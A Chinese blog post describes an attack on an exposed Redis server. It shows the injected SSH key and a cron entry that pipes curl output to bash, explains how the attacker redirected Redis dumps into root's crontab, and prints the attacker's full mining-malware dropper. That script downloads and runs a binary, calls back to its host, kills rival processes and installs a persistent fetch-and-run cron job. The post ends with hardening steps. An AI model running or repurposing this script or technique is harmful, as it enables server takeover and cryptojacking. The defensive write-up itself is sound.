linux stoping redis,linux服务器保险—— 一次redis攻击的遭遇
打開redis客戶端,發(fā)現(xiàn)redis中被存入了兩個(gè)莫名其妙的東西,key值分別為crackit和gfpyskqrma,我很確定自己的程序不會(huì)向redis中存入這兩個(gè)東西。
admin@VM-202-164-ubuntu:/$ /servers/redis-2.8.19/src/redis-cli -p 6379
127.0.0.1:6379> keys *
1) "crackit"
2) "gfpyskqrma"
查看這兩個(gè)都存的什么東西:
127.0.0.1:6379> get crackit
"\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCV6En/yo9BrY7ba0BsiFbg2hxLVdNerk1r3oKU1V0qeVMzRG8WdXkAiEXcvcmei1c85gPXDK3bqUX1XyLOy+hXfnTRRGfbMPOCclyoT/L3xeS1KMvWlP0qJVip7Mz+gwCEkQxSbZqdzBHStSFgAzoeGf12wUKEHLEpX7x7bs03vMUB8z7i1f10N+is84THQ4lMCpG4w3+CdeOKEssL2nL5abRhItjrfYgQH5cxtpwq55w97mVQ7PR9U2JSQSVWMTxy3rTx+7QP4JI2RS5yDRsjH4ISVwvu3gGyYAPfa6yofK+jjqChkyX4ipmTP9hAXf7lEvoZClVjCAwg1qslKieH aariz@el8.land\n\n\n\n"
127.0.0.1:6379> get gfpyskqrma
"\n\n* 10 * * * curl http://45.123.190.144:8080/lin.txt?redis | bash \n\n"
妥了,現(xiàn)在百分百確定服務(wù)器遭到了攻擊。crackit存的是一個(gè)ssh公鑰,gfpyskqrma存儲(chǔ)的是一個(gè)cron定時(shí)任務(wù)。
看到這我就氣急敗壞了,連我吃泡面省錢買的云服務(wù)都不放過!不管三七二十一了,先一頓噴再說,直接在這兩個(gè)key的值中噴他,也不管攻擊者能不能看到啦,由于不清楚他是哪國的,中文英文拼音都用上一遍。哼!
好了,進(jìn)入正題!現(xiàn)在研究一下他是怎么攻擊的,打開redis config:
127.0.0.1:6379> CONFIG GET *
1) "dbfilename"
2) "root"
3) "requirepass"
4) ""
5) "masterauth"
6) ""
7) "unixsocket"
8) ""
9) "logfile"
10) ""
11) "pidfile"
12) "/var/run/redis.pid"
13) "maxmemory"
14) "0"
15) "maxmemory-samples"
16) "3"
17) "timeout"
18) "0"
19) "tcp-keepalive"
20) "0"
21) "auto-aof-rewrite-percentage"
22) "100"
23) "auto-aof-rewrite-min-size"
24) "67108864"
25) "hash-max-ziplist-entries"
26) "512"
27) "hash-max-ziplist-value"
28) "64"
29) "list-max-ziplist-entries"
30) "512"
31) "list-max-ziplist-value"
32) "64"
33) "set-max-intset-entries"
34) "512"
35) "zset-max-ziplist-entries"
36) "128"
37) "zset-max-ziplist-value"
38) "64"
39) "hll-sparse-max-bytes"
40) "3000"
41) "lua-time-limit"
42) "5000"
43) "slowlog-log-slower-than"
44) "10000"
45) "latency-monitor-threshold"
46) "0"
47) "slowlog-max-len"
48) "128"
49) "port"
50) "6379"
51) "tcp-backlog"
52) "511"
53) "databases"
54) "16"
55) "repl-ping-slave-period"
56) "10"
57) "repl-timeout"
58) "60"
59) "repl-backlog-size"
60) "1048576"
61) "repl-backlog-ttl"
62) "3600"
63) "maxclients"
64) "10000"
65) "watchdog-period"
66) "0"
67) "slave-priority"
68) "100"
69) "min-slaves-to-write"
70) "0"
71) "min-slaves-max-lag"
72) "10"
73) "hz"
74) "10"
75) "repl-diskless-sync-delay"
76) "5"
77) "no-appendfsync-on-rewrite"
78) "no"
79) "slave-serve-stale-data"
80) "yes"
81) "slave-read-only"
82) "yes"
83) "stop-writes-on-bgsave-error"
84) "no"
85) "daemonize"
86) "no"
87) "rdbcompression"
88) "yes"
89) "rdbchecksum"
90) "yes"
91) "activerehashing"
92) "yes"
93) "repl-disable-tcp-nodelay"
94) "no"
95) "repl-diskless-sync"
96) "no"
97) "aof-rewrite-incremental-fsync"
98) "yes"
99) "aof-load-truncated"
100) "yes"
101) "appendonly"
102) "no"
103) "dir"
104) "/var/spool/cron"
105) "maxmemory-policy"
106) "volatile-lru"
107) "appendfsync"
108) "everysec"
109) "save"
110) "900 1 300 10 60 10000"
111) "loglevel"
112) "notice"
113) "client-output-buffer-limit"
114) "normal 0 0 0 slave 268435456 67108864 60 pubsub 33554432 8388608 60"
115) "unixsocketperm"
116) "0"
117) "slaveof"
118) ""
119) "notify-keyspace-events"
120) "gxE"
121) "bind"
122) "127.0.0.1 XXX.XXX.XXX.XXX" #此處馬賽克
127.0.0.1:6379>
可以看到,攻擊者修改了redis用于存儲(chǔ)數(shù)據(jù)的rdb文件的文件名和路徑,路徑和文件拼湊到一起是/var/spool/cron/root。這是要改我root用戶計(jì)劃任務(wù)的節(jié)奏啊,還好我的redis不是使用root用戶執(zhí)行的(這就是redis日志中出現(xiàn)大量權(quán)限不足的原因),要不然攻擊者已經(jīng)得手了。想想就可怕,如果我的redis是使用root用戶部署的,那攻擊者豈不是為所欲為了。例如他如果把SSH公鑰寫到/root/.ssh中,就可以暢通無阻地登錄我的服務(wù)器,或者他直接破壞掉我的/etc/passwd,那誰也別想登錄了,只能刷系統(tǒng)了。沒想到redis居然有這么大的漏洞。(通過redis的CONFIG SET dir /tmp/ 命令就可以直接動(dòng)態(tài)設(shè)置存儲(chǔ)路徑了,其他參數(shù)的設(shè)置也一樣)
還沒完。現(xiàn)在看一下他的定時(shí)腳本里邊都是什么內(nèi)容,直接瀏覽器打開http://45.123.190.144:8080/lin.txt?redis ,以下就是他的shell代碼:
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
HOST=45.123.190.144:8080
CALLBACK=$HOST
DOWNLOADER="curl "
#DOWNLOADER="wget -q -O - "
LFILE_NAME="BoomBoom"
# LFILE_PATH=`pwd`/$LFILE_NAME
LFILE_PATH=/tmp/$LFILE_NAME
DEFAULT_RFILE=$HOST/BoomBoom
OTHERS_RFILE=$HOST/BoomBoom2
CLEAN ()
{
grep -q -F '* soft memlock 262144' /etc/security/limits.conf || echo '* soft memlock 262144' >> /etc/security/limits.conf
grep -q -F '* hard memlock 262144' /etc/security/limits.conf || echo '* hard memlock 262144' >> /etc/security/limits.conf
grep -q -F 'vm.nr_hugepages = 256' /etc/sysctl.conf || echo 'vm.nr_hugepages = 256' >> /etc/sysctl.conf
sysctl -w vm.nr_hugepages=256
RMLIST=(/tmp/*index_bak* /tmp/*httpd.conf* /tmp/*httpd.conf /tmp/a7b104c270 /tmp/Carbon)
KILIST=(crobon sb1 wipefs AnXqV.yam zhuabcn@yahoo.com monerohash.com /tmp/a7b104c270 stratum.f2pool.com:8888 42HrCwmHSVyJSAQwn6Lifc3WWAWN56U8s2qAbm6BAagW6Ryh8JgWq8Q1JbZ8nXdcFVgnmAM3q86cm5y9xfmvV1ap6qVvmPe 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQt989KEfGRt6Ww2Xg8 46SDR76rJ2J6MtmP3ZZKi9cEA5RQCrYgag7La3CxEootQeAQULPE2CHJQ4MRZ5wZ1T73Kw6Kx4Lai2dFLAacjerbPzb5Ufg 42HrCwmHSVyJSAQwn6Lifc3WWAWN56U8s2qAbm6BAagW6Ryh8JgWq8Q1JbZ8nXdcFVgnmAM3q86cm5y9xfmvV1ap6qVvmPe xmrpool.eu mine.moneropool.com xmr.crypto-pool.fr:8080 xmr.crypto-pool.fr:3333 xmr.crypto-pool.fr:6666 xmr.crypto-pool.fr:7777 xmr.crypto-pool.fr:443)
for item in ${RMLIST[@]}
do
rm -rf $item
done
for item in ${KILIST[@]}
do
ps auxf|grep -v grep|grep $item|awk '{print $2}'|xargs kill -9
done
days=$(($(date +%s) / 60 / 60 / 24))
ps auxf|grep -v grep|grep "42HrCwmHSVyJSAQwn6Lifc3WWAWN56U8s2qAbm6BAagW6Ryh8JgWq8Q1JbZ8nXdcFVgnmAM3q86cm5y9xfmvV1ap6qVvmPe"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "45cToD1FzkjAxHRBhYKKLg5utMGENqyamWrY8nLNkVQ4hJgLHex1KNRZcz4finRjMpAYmPxDaXVpN2rV1jMNyXRdMEaH1YA"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep ${days}|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "logind.conf"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "cryptonight"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "kworker"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "Silence"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "45hsTaSqTQM4K1Xeqkcy7eLzqdEuQ594fJVmQryCemQSCU878JGQdSDCxbhNyVjSkiaYat8yAfBuRTPSEUPZoARm9a5XEHZ"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "47sghzufGhJJDQEbScMCwVBimTuq6L5JiRixD8VeGbpjCTA12noXmi4ZyBZLc99e66NtnKff34fHsGRoyZk3ES1s1V4QVcB"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu1G7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxumM"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "t.sh"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "wipefs"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "carbon"|awk '{print $2}'|xargs kill -9
pkill -f 49hNrEaSKAx5FD8PE49Wa3DqCRp2ELYg8dSuqsiyLdzSehFfyvk4gDfSjTrPtGapqcfPVvMtAirgDJYMvbRJipaeTbzPQu4
pkill -f 4AniF816tMCNedhQ4J3ccJayyL5ZvgnqQ4X9bK7qv4ZG3QmUfB9tkHk7HyEhh5HW6hCMSw5vtMkj6jSYcuhQTAR1Sbo15gB
pkill -f 4813za7ePRV5TBce3NrSrugPPJTMFJmEMR9qiWn2Sx49JiZE14AmgRDXtvM1VFhqwG99Kcs9TfgzejAzT9Spm5ga5dkh8df
pkill -f cpuloadtest
pkill -f crypto-pool
pkill -f xmr
pkill -f prohash
pkill -f monero
pkill -f miner
pkill -f nanopool
pkill -f minergate
pkill -f yam
pkill -f Silence
pkill -f yam2
pkill -f minerd
pkill -f Circle_MI.png
pkill -f curl
ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "crypto-pool"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "prohash"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "monero"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "miner"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "nanopool"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "minergate"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:3333"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:443"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "zhuabcn@yahoo.com"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "44pgg5mYVH6Gnc7gKfWGPR2CxfQLhwdrCPJGzLonwrSt5CKSeEy6izyjEnRn114HTU7AWFTp1SMZ6eqQfvrdeGWzUdrADDu"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "42HrCwmHSVyJSAQwn6Lifc3WWAWN56U8s2qAbm6BAagW6Ryh8JgWq8Q1JbZ8nXdcFVgnmAM3q86cm5y9xfmvV1ap6qVvmPe"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "49JsSwt7MsH5m8DPRHXFSEit9ZTWZCbWwS7QSMUTcVuCgwAU24gni1ydnHdrT9QMibLtZ3spC7PjmEyUSypnmtAG7pyys7F"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "479MD1Emw69idbVNKPtigbej7x1ZwFR1G3boyXUFfAB89uk2AztaMdWVd6NzCTfZVpDReKEAsVVBwYpTG8fsRK3X17jcDKm"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "11231"|awk '{print $2}'|xargs kill -9
pkill -f biosetjenkins
ps ax|grep var|grep lib|grep jenkins|grep -v httpPort|grep -v headless|grep "\-c"|xargs kill -9
ps ax|grep -o './[0-9]* -c'| xargs pkill -f
pkill -f Loopback
pkill -f apaceha
pkill -f cryptonight
ps ax|grep tmp|grep irqa|grep -v grep|awk '{print $1}'|xargs ps --ppid|awk '{print $1}'|grep -v PID|xargs kill -9
ps ax|grep tmp|grep irqa|grep -v grep|awk '{print $1}'|xargs kill -9
pkill -f 45.76.102.45
pkill -f stratum
pkill -f mixnerdx
pkill -f performedl
pkill -f sleep
pkill -f JnKihGjn
pkill -f irqba2anc1
pkill -f irqba5xnc1
pkill -f irqbnc1
pkill -f ir29xc1
pkill -f conns
pkill -f irqbalance
pkill -f crypto-pool
pkill -f minexmr
pkill -f XJnRj
pkill -f NXLAi
pkill -f BI5zj
pkill -f askdljlqw
pkill -f minerd
pkill -f minergate
pkill -f Guard.sh
pkill -f ysaydh
pkill -f bonns
pkill -f donns
pkill -f kxjd
pkill -f 108.61.186.224
pkill -f Duck.sh
pkill -f bonn.sh
pkill -f conn.sh
pkill -f kworker34
pkill -f kw.sh
pkill -f pro.sh
pkill -f polkitd
pkill -f acpid
pkill -f icb5o
pkill -f nopxi
ps -ef|grep '.so'|grep -v grep|cut -c 9-15|xargs kill -9;
pkill -f 45.76.146.166
pkill -f irqbalanc1
pkill -f 188.120.247.175
rm -rf /tmp/httpd.conf
rm -rf /tmp/conn
rm -rf /tmp/conns
rm -f /tmp/irq.sh
rm -f /tmp/irqbalanc1
rm -f /tmp/irq
}
DEFAULT ()
{
$DOWNLOADER $DEFAULT_RFILE > $LFILE_PATH
chmod +x $LFILE_PATH
ps -ef|grep $LFILE_NAME|grep -v grep
if [ $? -ne 0 ]; then
$LFILE_PATH -B && $DOWNLOADER "${CALLBACK}/?info=l60"
else
$DOWNLOADER "${CALLBACK}/?info=l69"
fi
}
OTHERS ()
{
$DOWNLOADER $OTHERS_RFILE > $LFILE_PATH
chmod +x $LFILE_PATH
ps -ef|grep $LFILE_NAME|grep -v grep
if [ $? -ne 0 ]; then
$LFILE_PATH -B && $DOWNLOADER "${CALLBACK}/?info=l30"
else
$DOWNLOADER "${CALLBACK}/?info=l39"
fi
}
CRON () {
if [ -x /usr/bin/wget ] ; then
echo '*/8 * * * * wget -q -O - $HOST/lin.txt |bash' > /tmp/.$LFILE_NAME.cron
elif [ -x /usr/bin/curl ] ; then
echo '*/8 * * * * curl $HOST/lin.txt |bash' > /tmp/.$LFILE_NAME.cron
else
exit 0;
fi
crontab -r
crontab /tmp/.$LFILE_NAME.cron
rm /tmp/.$LFILE_NAME.cron
}
INIT () {
echo 128 > /proc/sys/vm/nr_hugepages
sysctl -w vm.nr_hugepages=128
}
KILL () {
ps aux |grep -v sourplum | awk '{if($3>20.0) print $2}' | while read procid
do
kill -9 $procid
done
}
CLEAN
KILL
INIT
if [ $(getconf WORD_BIT) = '32' ] && [ $(getconf LONG_BIT) = '64' ] ; then
DEFAULT
else
OTHERS
fi
# CRON
crontab -r
等一下再看這個(gè)渾蛋做了什么,當(dāng)務(wù)之急是解決redis的問題,切斷他的攻擊渠道。
先關(guān)掉redis吧
dmin@VM-202-164-ubuntu:~$ ps -aux|grep redis|grep -v grep
admin 10167 0.0 1.3 38300 12136 ? Sl Feb03 1:27 /servers/redis-2.8.19/src/redis-server 127.0.0.1:6379
admin@VM-202-164-ubuntu:~$ kill -9 10167
admin@VM-202-164-ubuntu:~$ ps -aux|grep redis|grep -v grep
admin@VM-202-164-ubuntu:~$
進(jìn)入redis目錄,修改redis配置文件。
admin@VM-202-164-ubuntu:~/redis-2.8.19$ vi redis.conf
先修改一下bind:(說明一下:修改之前我是這樣配置的bind 127.0.0.1 XXX.XXX.XXX.XXX,其中xxx是騰訊云服務(wù)器的內(nèi)網(wǎng)ip,所以我沒理解錯(cuò)的話,攻擊者是使用騰訊云內(nèi)網(wǎng)ip登錄我的redis服務(wù)的。也就是說攻擊者使用的也是騰訊云服務(wù)器)
# Examples:
#
# bind 127.0.0.1 XXX.XXX.XXX.XXX
bind 127.0.0.1
再改下端口吧,不要用默認(rèn)的了:
# Accept connections on the specified port, default is 6379.
# If port 0 is specified Redis will not listen on a TCP socket.
port 6970
禁用掉CONFIG和EVAL命令:
# Example:
#
# rename-command CONFIG b840fc02d524045429941cc15f59e41cb7be6c52
#
# It is also possible to completely kill a command by renaming it into
# an empty string:
#
rename-command CONFIG ""
rename-command EVAL ""
還有最關(guān)鍵的,設(shè)置一個(gè)密碼:
# Warning: since Redis is pretty fast an outside user can try up to
# 150k passwords per second against a good box. This means that you should
# use a very strong password otherwise it will be very easy to break.
#
requirepass 2wsx!QAZ
啟動(dòng)redis吧,現(xiàn)在應(yīng)該足夠安全了吧:
admin@VM-202-164-ubuntu:~/redis-2.8.19$ /servers/redis-2.8.19/src/redis-cli -p 6970 -a '2wsx!QAZ'
啟動(dòng)客戶端別忘記加上密碼。最后就是修改應(yīng)用程序中的redis端口和密碼了。如果想要在其他服務(wù)器上也能訪問到redis服務(wù),那就只能bind上內(nèi)網(wǎng)ip了,但是推薦使用iptables創(chuàng)建防火墻規(guī)則。
一定不要使用root部署redis,太可怕了。
現(xiàn)在redis基本安全了,不用擔(dān)心再次受到攻擊了,但是還要檢查一下服務(wù)器,看看那個(gè)攻擊者有沒有留下什么東西,清理一下。
admin@VM-202-164-ubuntu:~$ cd .ssh
-bash: cd: .ssh: No such file or directory
admin@VM-202-164-ubuntu:~$ crontab -l
no crontab for admin
admin@VM-202-164-ubuntu:~$
admin@VM-202-164-ubuntu:/var/spool/cron$ ls -lrta
total 20
drwxrwx--T 2 daemon daemon 4096 Jan 15 2016 atspool
drwxr-xr-x 4 root root 4096 Oct 26 2016 ..
drwxr-xr-x 5 root root 4096 Oct 26 2016 .
drwxrwx--T 2 daemon daemon 4096 Oct 26 2016 atjobs
drwx-wx--T 2 root crontab 4096 Feb 4 18:51 crontabs
admin@VM-202-164-ubuntu:/var/spool/cron$ cd crontabs
-bash: cd: crontabs: Permission denied
攻擊者并沒有將SSH公鑰寫入當(dāng)前用戶,crontabs權(quán)限正常,是安全的,看來他直接是奔著root去的,并沒有得手。如此看來,這應(yīng)該是一個(gè)攻擊腳本了,那看來我噴他他是看不到了,唉!
最后看一下那個(gè)腳本都想要干什么吧:
先是清了一下相關(guān)進(jìn)程和臨時(shí)文件->>殺掉了cpu占用大于20%的進(jìn)程->>設(shè)置了一下nr_hugepages->>在他的服務(wù)器(45.123.190.144:8080/BoomBoom)上下載一個(gè)BoomBoom->>BoomBoom添加可執(zhí)行權(quán)限。好吧,不明覺厲,下載了BoomBoom看看,2.17M的一個(gè)東西,不知道是什么。
總結(jié)
以上是生活随笔為你收集整理的linux stoping redis,linux服务器保险—— 一次redis攻击的遭遇的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 论文阅读笔记 | 目标检测算法——PP-
- 下一篇: gpt linux双系统安装win7系统